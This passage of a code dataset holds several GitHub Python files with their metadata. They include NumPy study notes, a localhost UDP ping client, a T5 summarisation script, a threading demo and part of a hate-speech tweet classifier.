#f1.close()\n #print(\"写入文件完成...\")\n'''\n\nif __name__ == \"__main__\":\n getAverage(\"bridge_algebra06\",\"DAS3H\")\n getAverage(\"bridge_algebra06\",\"DASH\")\n getAverage(\"bridge_algebra06\",\"IRT\")\n getAverage(\"bridge_algebra06\",\"MIRTb\")\n getAverage(\"bridge_algebra06\",\"PFA\")\n getAverage(\"bridge_algebra06\",\"KTM\")\n getAverage(\"bridge_algebra06\",\"AFM\")\n\n getAverage(\"algebra05\",\"DAS3H\")\n getAverage(\"algebra05\",\"DASH\")\n getAverage(\"algebra05\",\"IRT\")\n getAverage(\"algebra05\",\"MIRTb\")\n getAverage(\"algebra05\",\"PFA\")\n 
getAverage(\"algebra05\",\"KTM\")\n getAverage(\"algebra05\",\"AFM\")\n\n getAverage(\"hdu\",\"DAS3H\")\n getAverage(\"hdu\",\"DASH\")\n getAverage(\"hdu\",\"IRT\")\n getAverage(\"hdu\",\"MIRTb\")\n getAverage(\"hdu\",\"PFA\")\n getAverage(\"hdu\",\"KTM\")\n getAverage(\"hdu\",\"AFM\")\n \n","repo_name":"hyLiu1994/KnowledgeModels","sub_path":"average_fold.py","file_name":"average_fold.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"73582785651","text":"#List Comprehension Method\nnum = [odd for odd in range(1, 21, 2)]\nprint(num)\n\n#Loop Method *Note: You have to make sure that the print function is not indented.\nnum = []\nfor odd in range(1, 21, 2):\n skip = odd\n num.append(skip)\nprint(num)\n","repo_name":"ICANDIGITAL/crash_course_python","sub_path":"chapter_4/odd_numbers.py","file_name":"odd_numbers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14030741722","text":"import time\nfrom socket import *\n\npings = 1\n\nwhile pings < 11: \n\n clientSocket = socket(AF_INET, SOCK_DGRAM)\n\n clientSocket.settimeout(1)\n test = 'teste'\n message = bytes(test, encoding='utf8')\n\n addr = (\"127.0.0.1\", 12000)\n\n start = time.time()\n clientSocket.sendto(message, addr)\n\n try:\n data, server = clientSocket.recvfrom(1024)\n end = time.time()\n elapsed = end - start\n print( data ) \n print( pings) \n print( elapsed ) \n \n\n except timeout:\n print ('REQUEST TIMED OUT')\n\n pings = pings - 1","repo_name":"zeraimundo/Socket","sub_path":"Exemplo02/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14353598383","text":"# Original file is located at https://colab.research.google.com/drive/1O1gJsEpM7iijBLsy5gsw6um488eL7FG-\n# [Hugging Face Models](https://huggingface.co/transformers/model_doc/t5.html)\n# [Hugging Face Framework Usage](https://huggingface.co/transformers/usage.html)\n\n\nimport torch\nimport transformers\nimport json\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration, T5Config\n\nprint(torch.__version__)\nprint(transformers.__version__)\n\n\nmodel = T5ForConditionalGeneration.from_pretrained(\"t5-large\")\ntokenizer = T5Tokenizer.from_pretrained(\"t5-large\")\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(f\"{device} is available in torch\")\nprint(model.config)\n\nprint(tokenizer.encode(\"summarize: \"))\nprint(tokenizer.decode(tokenizer.encode(\"summarize: \")))\n\n\ndef summarize(text, ml):\n preprocess_text = text.strip().replace(\"\\n\", \"\")\n t5_prepared_Text = \"summarize: \" + preprocess_text\n print(\"Preprocessed and prepared text: \\n\", t5_prepared_Text)\n\n tokenized_text = tokenizer.encode(t5_prepared_Text, return_tensors=\"pt\").to(device)\n summary_ids = model.generate(\n tokenized_text,\n num_beams=4,\n no_repeat_ngram_size=2,\n min_length=30,\n max_length=ml,\n early_stopping=True,\n )\n return tokenizer.decode(summary_ids[0], skip_special_tokens=True)\n\n\nwith open(\"../data/transformers/sample_text.txt\", mode=\"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\nprint(\"samples : \", len(lines))\n\nfor line in lines:\n print(\"Number of characters:\", len(line), end=\"\\n\")\n print(\"Summarized text: \\n\", summarize(line, 
ml=50))\n","repo_name":"mecha2k/py-nlp","sub_path":"src/transformers/07 summarizing_text_t5.py","file_name":"07 summarizing_text_t5.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22258521153","text":"# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef draw():\n X = np.linspace(0, 10, 50)\n noise = np.random.normal(0, 0.5, X.shape)\n Y = X * 0.5 + 3 + noise\n\n plt.scatter(X, Y)\n plt.savefig(\"scattergraph.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n draw()","repo_name":"mk43/machine-learning","sub_path":"algorithm/linear-regression/ScatterGraph.py","file_name":"ScatterGraph.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41233560487","text":"import numpy as np\nimport numpy.linalg as la\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as color\nimport scipy.special\nfrom matplotlib.animation import ArtistAnimation\n\n# TODO: Time functions and compare q and numpy.linalg\n\n\ndef householder_transform_matrix(matrix): # Najlazje je samo lociti postopek za k = 0 (oz. prvi stolpec matrike)\n \"\"\"\n Wonky as f and needs debugging because for some odd reason has problems with zero division and returning nan.\n Dejansko tudi, ko dela, dela ocitno tako slabo, da QR potem rabi DLJE da konca.\n \"\"\"\n a = np.copy(matrix)\n n = np.shape(a)[0] # Numpy dimenzija (ki je enaka pravi dimenziji, samo indeksi tecejo od 0)\n if wonky_exit(a):\n return a\n\n alpha = -np.sign(a[1][0]) * np.sqrt(np.sum([a[j][0]**2 for j in range(1, n)]))\n r = np.sqrt(0.5*alpha**2 - 0.5*alpha*a[1][0])\n v = [0, (a[1][0] - alpha)/(2*r)]\n for j in range(2, n):\n v.append(a[j][0]/(2*r))\n vect = np.array(v)\n P = np.eye(n) - 2*np.outer(vect, vect)\n a = np.matmul(np.matmul(P, a), P)\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n # img.append([plt.imshow(a, cmap=\"hot\", norm=color.SymLogNorm(linthresh=0.1))])\n\n for k in range(1, n - 1): # Ne gre cisto do konca! k-2 => n - 1\n alpha = -np.sign(a[k][k-1]) * np.sqrt(np.sum([a[j][k-1]**2 for j in range(k, n)]))\n r = np.sqrt(0.5*(alpha**2 - a[k][k-1]*alpha))\n v = []\n for l in range(0, n):\n if l < k:\n v.append(0)\n elif l == k:\n v.append((a[k][k-1]-alpha)/(2*r))\n elif l > k:\n v.append((a[l][k-1])/(2*r))\n vect = np.array(v)\n P = np.eye(n) - 2 * np.outer(vect, vect)\n a = np.matmul(P, np.matmul(a, P))\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n return a\n\n\ndef zero_filter(matrix, epsilon):\n a = np.copy(matrix)\n for index_pairs, value in np.ndenumerate(a):\n if np.abs(value) < epsilon:\n a[index_pairs[0]][index_pairs[1]] = 0\n img.append([plt.imshow(a, cmap=\"PiYG\", norm=color.CenteredNorm(vcenter=0))])\n return a\n\n\ndef wonky_exit(matrix, epsilon=10**-10):\n return np.abs(np.sum(np.abs(matrix)) - np.sum(np.abs(np.diag(matrix)))) < epsilon\n\n\ndef qr_decomp(matrix):\n a = np.copy(matrix)\n m, n = np.shape(a)\n Q = np.eye(m)\n for i in range(n):\n H = np.eye(m)\n H[i:, i:] = householder_transform_vect(a[i:, i]) # Rabimo spodnji kvadrant oz. 
kvadrat spodaj\n Q = np.matmul(Q, H)\n a = np.matmul(H, a)\n return Q, a\n\n\ndef householder_transform_vect(vector):\n v = vector/(vector[0] + np.copysign(np.sqrt(np.sum([val**2 for c, val in np.ndenumerate(vector)])), vector[0]))\n v[0] = 1\n H = np.eye(np.shape(vector)[0])\n H -= (2/np.dot(v, v)) * np.outer(v, v)\n\n return H\n\n\ndef diagonalize(matrix, tol=10**-15, maxiter=10000):\n \"\"\"\n A diagonalization and eigenvector calculation method\n :param matrix: input matrix to diagonalize\n :param tol: tolerance for zero filter\n :param maxiter: maximum number of iterations\n :return Diagonalized matrix and matrix of eigenvectors\n \"\"\"\n tridiag = matrix # DEBUG STEP?\n # tridiag = householder_transform_matrix(matrix) # Broken for some damn reason\n # tridiag = zero_filter(tridiag, tol)\n s = np.eye(tridiag.shape[0]) # To store eigenvectors\n # print(tridiag)\n for i in range(maxiter):\n # Q = np.eye(tridiag.shape[0])\n print(\"Iter: {}\".format(i))\n if i == maxiter - 1:\n raise Warning(\"Maximum number of iterations exceeded\")\n # warnings.warn(\"Maximum number of iterations exceeded\")\n # break\n if wonky_exit(tridiag):\n print(i)\n break\n Q, R = qr_decomp(tridiag)\n tridiag = zero_filter(np.matmul(Q.T, np.matmul(tridiag, Q)), tol)\n s = np.matmul(s, Q)\n\n return tridiag, s\n\n\ndef lho(n):\n return np.diag([i + 1/2 for i in range(0, n)])\n\n\ndef delta(i, j):\n return int(i == j)\n\n\ndef q_matrix_single(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n matrix[i][j] = 0.5 * np.sqrt(i + j + 1) * delta(np.abs(i - j), 1)\n\n return np.matmul(matrix, np.matmul(matrix, np.matmul(matrix, matrix)))\n\n\ndef q_matrix_double(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n a = np.sqrt(j * (j - 1)) * delta(i, j - 2)\n b = (2 * j + 1) * delta(i, j)\n c = np.sqrt((j + 1) * (j + 2)) * delta(i, j + 2)\n matrix[i][j] = 0.5 * (a + b + c)\n\n return np.matmul(matrix, matrix)\n\n\ndef q_matrix_quad(n):\n matrix = np.zeros((n, n))\n for ind, val in np.ndenumerate(matrix):\n i, j = ind\n prefac = 1/(2**4) * np.sqrt((2**i * np.math.factorial(i))/(2**j * np.math.factorial(j)))\n a = delta(i, j + 4)\n b = 4*(2 * j + 3) * delta(i, j + 2)\n c = 12*(2*j**2 + 2*j + 1) * delta(i, j)\n d = 16*j*(2*j**2 - 3*j + 1) * delta(i, j - 2)\n e = 16*j*(j**3 - 6*j**2 + 11*j - 6) * delta(i, j - 4)\n matrix[i][j] = prefac * (a + b + c + d + e)\n\n return matrix\n\n\ndef data_sort(diag, Q):\n diag_elements = np.diag(diag)\n vectors = np.copy(Q)\n output = []\n for coord, val in np.ndenumerate(diag_elements):\n output.append([val, vectors[coord[0]]])\n output.sort()\n\n return np.array(output)\n\n\ndef basis(q, n):\n return (2**n * np.math.factorial(n) * np.sqrt(np.pi))**(-1/2) * np.exp(-q**2/2) * scipy.special.eval_hermite(n, q)\n\n\ndef anharmonic(lamb, n, func):\n return lho(n) + lamb*func(n)\n\n\ndef plot_poly(x, vect):\n c = [vect[i]*basis(x, i) for i in range(len(vect))]\n return np.sum(c)\n\n\ndef arrayize(array, function, *args):\n return np.array([function(x, *args) for x in array])\n\n\ndef time_diag(x, lamb): # Idea: x is element of matrix sizes to time diagonalization\n times = []\n for element in list(x):\n data = anharmonic(lamb, element, q_matrix_single)\n pre = time.time()\n diagonalize(data, tol=10**-5)\n post = time.time()\n times.append(post-pre) # Should return seconds elapsed\n\n return np.array(times)\n\n\ndef time_eigh(x, lamb): # Idea: x is element of matrix sizes to time diagonalization\n times = []\n for element in 
list(x):\n data = anharmonic(lamb, element, q_matrix_single)\n pre = time.time()\n dummy = la.eigh(data)\n post = time.time()\n times.append(post-pre) # Should return seconds elapsed\n\n return np.array(times)\n\n\nfig, ax = plt.subplots()\nimg = [] # PAZI: To mora biti tu preden klices funkcijo, da ima kam spraviti slike za animacijo!\n\nlam = 0.5\ndata = anharmonic(lam, 10, q_matrix_single)\n# data = anharmonic(lam, 10, q_matrix_double)\n# data = anharmonic(lam, 10, q_matrix_quad)\n\ndiag, Q = diagonalize(data, tol=10**-5, maxiter=10000)\n\n# Plot matrix heat map animation\nani = ArtistAnimation(fig, img, interval=90, repeat=False, blit=True)\nplt.title(\"Matrix diagonalization\")\nplt.axis(\"off\")\nplt.colorbar()\n# ani.save(\"1.mp4\", \"ffmpeg\", fps=20)\nplt.show()\n\n# Plot osnovnih vezanih stanj\n# plt.title(\"Prvih 10 vezanih stanj za nemoten harmonski oscilator\")\n# x = np.linspace(-5, 5, 200)\n# plt.plot(x, x**2)\n# plt.ylim(0, 20)\n# for i in range(10):\n# plt.plot(x, basis(x, i) + 2*i)\n# plt.xlabel(r\"$x$\")\n# plt.ylabel(r\"$|n\\rangle$\")\n#\n# plt.show()\n\n# Plot lastnih stanj za motnjo lambda\n# lam = 1\n# plt.title(r\"Prvih 10 lastnih stanj za anharmonski oscilator z $\\lambda = {}$\".format(lam))\n# x = np.linspace(-5, 5, 200)\n# plt.plot(x, x**2 + lam*x**4, label=\"V(x)\", color=\"#FFA0FD\")\n# plt.ylim(-1, 22)\n# sort = data_sort(diag, Q)\n# i = 0\n# color_vec = [\"987284\", \"CDC6AE\", \"A3B4A2\", \"38686A\", \"A18276\", \"682D63\", \"414288\", \"5FB49C\", \"98DFAF\", \"CBBAED\"]\n# for vec in range(Q.shape[1]):\n# plt.plot(x,18 + arrayize(x, plot_poly, Q[:, vec]) - 2*i, color=\"#{}\".format(color_vec[i]))\n# i += 1\n# plt.ylabel(r\"$|n\\rangle$\")\n# columns = [r\"$|n^{0}\\rangle$\", r\"$|n^{1}\\rangle$\", r\"$|n^{2}\\rangle$\", r\"$|n^{3}\\rangle$\",\n# r\"$|n^{4}\\rangle$\", r\"$|n^{5}\\rangle$\", r\"$|n^{6}\\rangle$\", r\"$|n^{7}\\rangle$\",\n# r\"$|n^{8}\\rangle$\", r\"$|n^{9}\\rangle$\"]\n# rows = [r\"$E_n$\"]\n# cell_text = [[round(sort[i][0], 2) for i in range(10)]]\n# plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, bbox=[0, -0.3, 1, 0.2])\n# plt.subplots_adjust(bottom=0.21)\n# plt.legend()\n# plt.show()\n\n# Plot of diagonalization routine run times\n# x = np.arange(2, 100)\n# y1 = time_diag(x, 0.5)\n# y2 = time_eigh(x, 0.5)\n# plt.title(\"Function run times\")\n# plt.plot(x, y1, color=\"#D7BCE8\", label=\"diagonalize()\")\n# plt.plot(x, y2, color=\"#439A86\", label=\"np.linalg.eigh()\")\n# plt.xlabel(\"N\")\n# plt.yscale(\"log\")\n# plt.ylabel(\"t [s]\")\n# plt.legend()\n# plt.show()\n","repo_name":"pengu5055/mfp03","sub_path":"main_03.py","file_name":"main_03.py","file_ext":"py","file_size_in_byte":8857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15724723488","text":"# -*- coding:utf-8 -*-\n# email:jiangrry@qq.com\n# author:jiangrry\n\n\"\"\"\n event 互斥方法\n 引入\n\"\"\"\n\nfrom threading import Event, Thread\nfrom time import sleep\n\ne = Event() # 创建 Event 对象\ns = None # 全局变量 --> 用于通信 共享资源\n\n\ndef func01():\n print(\"对口令!!!\")\n global s\n s = \"天王盖地虎\"\n e.set() # 终止阻塞\n\n\nt = Thread(target=func01)\nt.start()\nprint(\"对对口令才是自己人\")\ne.wait() # 主线程会阻塞等待\nif s == \"天王盖地虎\":\n print(\"宝塔镇河妖\")\n print(\"自己人\")\nelse:\n 
print(\"开枪,打死你!\")\n","repo_name":"jiangrry/study","sub_path":"Month2/CONCURRENT/Process&Thread/Thread/demo.thread.py","file_name":"demo.thread.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16164005959","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 12 15:59:10 2021\r\n@author: joelr\r\nEstudos da Biblioteca Numpy\r\n\"\"\"\r\nimport numpy as np\r\n\r\nmy_array = np.array([[1, 2, 3, 4 , 5], [6, 7, 8, 9, 10 ]])\r\n\r\nmy_array = np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])\r\n\r\nx = my_array.copy()\r\n\r\nprint(my_array)\r\nprint(my_array.shape[0]) #Mostra n elementos\r\nprint(np.arange(10)) #Cria vetor sequencial\r\nprint(my_array[1,1])\r\n\r\nmy_array = np.empty([2,5]) #cria valores aleatórios\r\nfor i in range(2):\r\n for j in range(5):\r\n my_array[i,j] = i*j\r\n print(my_array[i,j])\r\n \r\nmy_array = np.zeros([2,5]) #cria matriz de zeros\r\nmy_array = np.ones([2,5]) #cria matriz de 1\r\naleatorio = np.random.random()\r\nmy_array = np.random.random([2,5])\r\nprint(my_array[1,0:4]) \r\nprint(my_array[:,3])\r\nprint(my_array[1][2])\r\nprint(type(my_array))\r\n\r\n\r\na = np.array([[1, 2], [3, 4]])\r\nb = np.array([[5, 6], [7, 8]])\r\n\r\nsoma = a+b\r\ndifference = a-b\r\nproduct = a*b\r\nquotient = a/b\r\n\r\nmatrix_product = a.dot(b)\r\n\r\nfor i in range(my_array.shape[0]):\r\n for j in range(my_array.shape[1]):\r\n for k in range(my_array.shape[2]):\r\n print(my_array[i,j,k])\r\n \r\nmy_array = np.array([1, 2, 3, 4], ndmin=5)\r\nprint(my_array.ndim)\r\n\r\nprint(my_array[1, -1])#indice negativo acessa o final do vetor\r\nprint(my_array[:,0:4:2])\r\nprint(my_array[:,-3:-1])\r\nprint(my_array[:,::2])\r\n\r\nmy_array2 = np.array([1, 2, 3, 4], dtype='S')\r\nmy_array2= np.array(['banana', 'maçã','3'])\r\nprint(my_array.dtype)\r\n\r\nfor i in my_array:\r\n for j in i:\r\n print(j)\r\n\r\n\r\narr = np.array([[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])\r\n\r\nfor x in arr:\r\n print(\"x represents the 2-D array:\")\r\n print(x)\r\n\r\narr1 = np.array([1, 2, 3])\r\n\r\narr2 = np.array([4, 5, 6])\r\n\r\narr = np.concatenate((arr1, arr2))\r\n\r\nprint(arr)\r\n\r\n\r\narr1 = np.array([[1, 2], [3, 4]])\r\n\r\narr2 = np.array([[5, 6], [7, 8]])\r\n\r\narr = np.concatenate((arr1, arr2), axis=1)\r\n\r\nprint(arr)\r\n\r\narr1 = np.array([1, 2, 3])\r\n\r\narr2 = np.array([4, 5, 6])\r\n\r\narr = np.stack((arr1, arr2), axis=1)\r\n\r\nprint(arr)\r\n\r\nword = \"apartamento\"\r\nfor i in range(len(word)-1,-1,-1):\r\n print(word[i])\r\n\r\nnp.array_split(my_array,2)\r\n\r\nx = np.where(my_array == 4) #tuple com linha e coluna \r\n\r\nx = np.where(my_array[0,:]%2 == 0) #posição do número é impar\r\nx = np.where(my_array[0,:]%2 == 1) #posição do número par\r\n\r\n\r\narr = np.array(['banana', 'cherry', 'apple'])\r\narr = np.array([True, False, True])\r\narr = np.array([[3, 2, 4], [5, 0, 1]])\r\n\r\nprint(np.sort(arr))\r\n\r\n#Filtros\r\n\r\narr = np.array([41, 42, 43, 44])#mask\r\n\r\nx = [True, False, True, False]\r\n\r\nnewarr = arr[x]\r\n\r\nprint(newarr)\r\n\r\n\r\nmy_array = np.array([41, 42, 43, 44])\r\n\r\n# Create an empty list\r\nfilter_arr = []\r\n\r\n# go through each element in arr\r\nfor element in arr:\r\n # if the element is higher than 42, set the value to True, otherwise False:\r\n if element > 42:\r\n filter_arr.append(True)\r\n else:\r\n filter_arr.append(False)\r\n\r\nnew_array = 
my_array[filter_arr]\r\n\r\nprint(filter_arr)\r\nprint(new_array)\r\n\r\narr = np.array([41, 42, 43, 44])\r\n\r\nfilter_arr = arr > 42\r\n\r\nnewarr = arr[filter_arr]\r\n\r\nprint(filter_arr)\r\nprint(newarr)\r\n\r\n#Comandos Ramdom\r\nfrom numpy import random\r\nx = random.randint(100)#Random inteiro\r\nx = random.rand()\r\nx = random.rand(5)\r\nx = random.rand(3,5)\r\nx=random.randint(100, size=(5,5))\r\nx = random.choice([3, 5, 7, 9]) #retorna um valor do vetor\r\nx = random.choice([3,4,5, 6,7,8], size=(3,5)) #Constrói a matrix puxando números da base referida\r\n\r\n#configura probabolidade de escolha dos números\r\nx = random.choice([3, 5, 7, 9], p=[0.1, 0.3, 0.6, 0.0], size=(100))\r\nx = random.choice([3, 5, 7, 9], p=[0.1, 0.3, 0.6, 0.0], size=(3, 5))\r\n\r\nmy_array = np.array([1, 2, 3, 4, 5])\r\n\r\nrandom.shuffle(my_array) #embaralha os números e altera a matriz\r\nrandom.permutation(my_array) #embaralha os números criando uma nova matriz\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nsns.distplot([0, 1, 2, 3, 4, 5], hist = True)\r\nplt.show()\r\n\r\n#Distribuição Normal Analógica\r\n# loc - (Mean) where the peak of the bell exists.\r\n\r\n# scale - (Standard Deviation) how flat the graph distribution should be.\r\n\r\n# size - The shape of the returned array.\r\n\r\nx = random.normal(size=(100, 1000))\r\nx = random.normal(loc=0, scale=5, size=(100, 100))\r\nsns.distplot(x, hist = True)\r\nplt.show()\r\n\r\n\r\n#distribuição binomial (Normal Digital)\r\n# n - number of trials.\r\n# p - probability of occurence of each trial (e.g. for toss of a coin 0.5 each).\r\n\r\n# size - The shape of the returned array.\r\nx = random.binomial(n=10, p=0.5, size=10)\r\nx = random.binomial(n=10, p=0.9, size=1000)\r\nsns.distplot(x, hist=True, kde=False)\r\nplt.show()\r\n\r\n\r\n#comparação entre métodos\r\nsns.distplot(random.normal(loc=50, scale=5, size=1000), hist=False, label='normal')\r\nsns.distplot(random.binomial(n=100, p=0.5, size=1000), hist=False, label='binomial')\r\nplt.show()\r\n\r\n# Poisson Distribution is a Discrete Distribution.\r\n\r\n# It estimates how many times an event can happen in a specified time. e.g. If someone eats twice a day what is probability he will eat thrice?\r\n\r\n# It has two parameters:\r\n\r\n# lam - rate or known number of occurences e.g. 2 for above problem.\r\n\r\n# size - The shape of the returned array.\r\n\r\nx = random.poisson(lam=2, size=10)\r\nsns.distplot(random.poisson(lam=7, size=10000), kde=False)\r\nplt.show()\r\n\r\n#comparação entre normal e poisson\r\nsns.distplot(random.normal(loc=50, scale=7, size=1000), hist=False, label='normal')\r\nsns.distplot(random.poisson(lam=50, size=1000), hist=False, label='poisson')\r\nplt.show()\r\n\r\n# Uniform Distribution\r\n# Used to describe probability where every event has equal chances of occuring.\r\n\r\n# E.g. Generation of random numbers.\r\n\r\n# It has three parameters:\r\n\r\n# a - lower bound - default 0 .0.\r\n\r\n# b - upper bound - default 1.0.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.uniform(size=100), hist=False)\r\nplt.show()\r\n\r\n# Logistic Distribution\r\n# Logistic Distribution is used to describe growth.\r\n\r\n# Used extensively in machine learning in logistic regression, neural networks etc.\r\n\r\n# It has three parameters:\r\n\r\n# loc - mean, where the peak is. Default 0.\r\n\r\n# scale - standard deviation, the flatness of distribution. 
Default 1.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.logistic(size=1000), hist=False)\r\nplt.show()\r\n\r\n#gaussiana x logistic distribuition\r\nsns.distplot(random.normal(scale=2, size=1000), hist=False, label='normal')\r\nsns.distplot(random.logistic(size=1000), hist=False, label='logistic')\r\nplt.show()\r\n\r\n# Pareto Distribution\r\n# A distribution following Pareto's law i.e. 80-20 distribution (20% factors cause 80% outcome).\r\n\r\n# It has two parameter:\r\n\r\n# a - shape parameter.\r\n\r\n# size - The shape of the returned array.\r\n\r\nsns.distplot(random.pareto(a=2, size=1000), kde=False)\r\nplt.show()\r\n\r\n\r\n### Functions\r\n#Somar elementos entre vetores\r\nx = [1, 2, 3, 4] #lista\r\ny = [4, 5, 6, 7]\r\n\r\nx = np.array([1, 2, 3])\r\ny = np.array([5, 6, 7])\r\nz = np.add(x, y)\r\nz = np.sum([x,y])\r\nz = np.subtract(x, y)\r\nz = np.multiply(x, y)\r\nz = np.divide(x, y)\r\nz = np.power(x,y)\r\nz = np.mod(x,y)\r\nz = np.remainder(x,y)\r\nz = np.divmod(x,y)\r\nz = np.absolute(x,y)\r\nprint(z)\r\n\r\nx = np.array([-1, 2.555, 3.9])\r\nz = np.trunc(x)\r\nz = np.fix(x)\r\nz = np.around(x)\r\nz = np.floor(x)\r\nz = np.ceil(x)\r\n\r\nx = np.arange(1,10)#não inclui o 10\r\nz = np.log2(x)\r\nz = np.log10(x)\r\nz = np.log()\r\n\r\n\r\nx = np.array([1, 2, 3])\r\nz = np.prod(x)\r\nz = np.prod([x,x])\r\n\r\n# Finding LCM (Lowest Common Multiple)\r\nnum1 = 4\r\nnum2 = 6\r\nx = np.lcm(num1, num2)\r\n\r\n#Finding GCD (Greatest Common Denominator)\r\nnum1 = 6\r\nnum2 = 15\r\nx = np.gcd(num1,num2)\r\nx = np.gcd.reduce([3,5,8,9,24])\r\n\r\n\r\nx = np.sin(np.pi/2)\r\narr = np.array([np.pi/2, np.pi/3, np.pi/4, np.pi/5])\r\nx = np.sin(arr)\r\n\r\narr = np.array([90, 180, 270, 360])\r\nx = np.deg2rad(arr) #converte para radianos\r\n\r\nx = np.sinh(np.pi/2) #função hiperbólica\r\nx = np.arcsinh(1.0)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JoelRamosC/Algorithms_PYTHON","sub_path":"numpy_comando_basicos.py","file_name":"numpy_comando_basicos.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21994933345","text":"import random\nimport pickle\nimport numpy as np\nfrom nltk.tokenize import word_tokenize\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as vs\nfrom textstat.textstat import *\nimport preprocessing as cleaner\nfrom statistics import mode\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom nltk.classify import ClassifierI\nfrom sklearn.feature_selection import SelectFromModel\n\n\n\nl_stop = 'a an and are as at be by for from has he in is it its of on the that to was were will with is are am'.split()\nhate = open( \"hate.txt\", 'r' ).read()\noffensive = open( 'offensive.txt', 'r' ).read()\nnone = open( 'nonenew.txt', 'r').read()\n\n\n\ndef converter(tweet):\n sent= cleaner.preprocessing_stage1(tweet)\n sent= \" \".join(sent)\n final_tfidf= new_vectorizer.transform([sent]).toarray()\n final_tfidf= final_tfidf*idf_vals_\n\n sent1= cleaner.preprocessing_for_pos_tags([sent])\n final_pos= new_pos_vectorizer.transform(sent1).toarray()\n\n\n final_other= get_feature_array([tweet])\n\n transformed_tweet = np.concatenate([final_tfidf, final_pos, final_other],axis=1)\n\n \n return transformed_tweet\n\n\n\nclass 
voted_classifier(ClassifierI):\n \n\n def __init__(self,*classifiers):\n self._classifier=classifiers\n\n \n\n\n def predict_type(self,tweet):\n final_feature= converter(tweet)\n vote=[]\n for c in self._classifier:\n v=c.predict(final_feature)\n vote.append(int(v[0]))\n\n return mode(vote)\n \n \n \n \ndef find_accuracy(y_true, y_pred):\n count=0\n for i in range(len(y_true)):\n if y_pred[i] == y_true[i]:\n count += 1\n return count*100/len(y_true)\n\n\n\n\ndocument = []\nfor i in hate.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, 'Hate'))\n\n\nfor i in offensive.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, 'Offensive'))\n\n\nfor i in none.split('\\n'):\n token_list= cleaner.preprocessing_stage1(i)\n document.append((token_list, \"None\"))\n\n\n\n\n\n\n\nfeatures = []\ntargets = []\nfor f, t in document: \n features.append(\" \".join(f))\n targets.append(t)\n\n\n \ndoc2 = []\nfor i in hate.split('\\n'):\n doc2.append(i)\nfor i in offensive.split('\\n'):\n doc2.append(i)\nfor i in none.split('\\n'):\n doc2.append(i)\n\n\n\n\nsave_doc = open(\"doc.pickle\", 'wb')\npickle.dump(document, save_doc)\nsave_doc.close()\nprint(\"Pickle of document is made.\")\n\n\nsave_doc2 = open(\"doc2.pickle\", \"wb\")\npickle.dump(doc2, save_doc2)\nsave_doc2.close()\nprint(\"Pickle of doc2 is made.\")\n\n# fx = open( \"doc2.pickle\", \"rb\" )\n# doc2 = pickle.load( fx )\n# fx.close()\n#\n# fx = open( \"doc.pickle\", \"rb\" )\n# document = pickle.load( fx )\n# fx.close()\n\n\n\n\n\n\n\ntarget = []\nfor t in targets:\n if t == \"Hate\":\n target.append([0])\n elif t == \"Offensive\":\n target.append( [1] )\n else:\n target.append( [2] )\n\ntarget = np.array(target)\n\nsave_new = open(\"new_pickle.pickle\",\"wb\")\npickle.dump(target, save_new)\nsave_new.close()\nprint(\"target has been pickled\")\n\n# fx = open(\"new_pickle.pickle\", \"rb\")\n# new = pickle.load(fx)\n# fx.close()\n\n\n\nvectorizer = TfidfVectorizer(\n ngram_range=(1, 3),\n stop_words=l_stop,\n use_idf=True,\n lowercase=True,\n smooth_idf=False,\n norm=None,\n decode_error='replace',\n max_features=10000, \n min_df=5,\n max_df=0.75\n)\n\ntfidf = vectorizer.fit_transform(features).toarray()\nvocab = {v:i for i, v in enumerate(vectorizer.get_feature_names())}\nidf_vals = vectorizer.idf_\n\nfeature_name_tfidf=[]\nfor k,v in vocab.items():\n 